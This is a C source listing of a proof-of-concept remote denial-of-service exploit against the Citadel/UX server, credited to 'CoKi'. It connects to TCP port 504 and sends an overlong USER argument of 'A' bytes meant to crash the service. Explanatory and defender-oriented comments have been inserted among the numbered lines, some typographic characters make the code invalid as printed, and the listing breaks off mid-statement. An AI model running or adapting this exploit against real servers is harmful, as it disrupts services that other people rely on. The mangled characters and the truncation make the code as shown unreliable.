1 /* citadel_dos.c
2 *
3 * Citadel/UX Remote DoS exploit (Proof of Concept)
4 *
5 * Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
6 *
7 * by CoKi <coki@nosystem.com.ar>
8 * No System Group − http://www.nosystem.com.ar
9 */
10
11 #include <stdio.h>
12 #include <stdlib.h>
13 #include <unistd.h>
14 #include <errno.h>
15 #include <string.h>
16 #include <getopt.h>
17 #include <netdb.h>
18 #include <sys/types.h>
19 #include <sys/fcntl.h>
20 #include <netinet/in.h>
21 #include <sys/socket.h>
22
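/*
 * Size of the two stack buffers declared in main() (`buffer` and `temp`):
 * 96 bytes plus one for a terminating NUL.  Parenthesized so the macro
 * keeps its value inside a larger expression (the bare `96+1` turns
 * `BUFFERSIZE * 2` into `96 + 1*2`).
 */
#define BUFFERSIZE (96 + 1)

/*
 * Failure value that main() compares against the results of socket() and
 * connect_timeout().  Written with an ASCII minus sign and parenthesized;
 * the listing's typographic minus character is not valid C.
 */
#define ERROR (-1)

/*
 * Passed as the `timeout` argument of connect_timeout().
 * NOTE(review): presumably seconds; confirm against the definition, which
 * is not part of this section of the listing.
 */
#define TIMEOUT 3

/*
 * TCP port main() connects to (via htons(PORT)).
 * Defender note: main() sends "USER " followed by a run of 'A' bytes to
 * this port, so an unusually long USER argument arriving on TCP 504 is the
 * observable to log and alert on, and a server-side length check on that
 * argument is the corresponding control.
 */
#define PORT 504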
27
/*
 * Forward declarations.  Neither function is defined in this section of
 * the listing; the notes below are based only on how main() calls them.
 */

/*
 * Called by main() with the socket, the destination address, its length
 * and TIMEOUT.  main() treats a return value of ERROR as a failed
 * connection ("Closed") and exits.
 * NOTE(review): the name suggests a connect() wrapper with a deadline;
 * confirm against the definition.
 */
int connect_timeout(int sfd,
                    struct sockaddr *serv_addr,
                    socklen_t addrlen,
                    int timeout);

/*
 * Called by main() with argv[0] when the argument count is not 2.
 * NOTE(review): presumably prints a usage message and terminates, since
 * main() goes on to read argv[1] afterwards; confirm against the definition.
 */
void use(char *program);
31
32 int main(int argc, char *argv[]) {
33 char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
34 int sockfd;
35 struct hostent *he;
36 struct sockaddr_in dest_dir;
37
38 if(argc != 2) use(argv[0]);
39
40 p = buffer;
41
42 printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
43 printf(" by CoKi <coki@nosystem.com.ar>\n\n");
44
45 memset(p, ’A’, 96);
46 p += 92;
47 *p = ’\0’;
48
49 printf(" [+] verifying host:\t");
50 fflush(stdout);
51
52 if((he=gethostbyname(argv[1])) == NULL) {
53 herror("Error");
54 printf("\n");
55 exit(1);
56 }
57
58 printf("OK\n");
59
60 if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
61 perror("Error");
62 printf("\n");
63 exit(1);
64 }
65
66 dest_dir.sin_family = AF_INET;
67 dest_dir.sin_port = htons(PORT);
68 dest_dir.sin_addr = *((struct in_addr *)he−>h_addr);
69 bzero(&(dest_dir.sin_zero), 8);
70
71 printf(" [+] conecting...\t");
72 fflush(stdout);
73
74 if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
75 sizeof(struct sockaddr), TIMEOUT) == ERROR) {
76
77 printf("Closed\n\n");
78 exit(1);
79 }
80
81 printf("OK\n");
82
83 printf(" [+] sending exploit...\t");
84 fflush(stdout);
85
86 recv(sockfd, temp, sizeof(temp), 0);
87 send(sockfd, "USER ", 5, 0);
88 send(sockfd, buffer, strlen(buffer), 0);
89 sen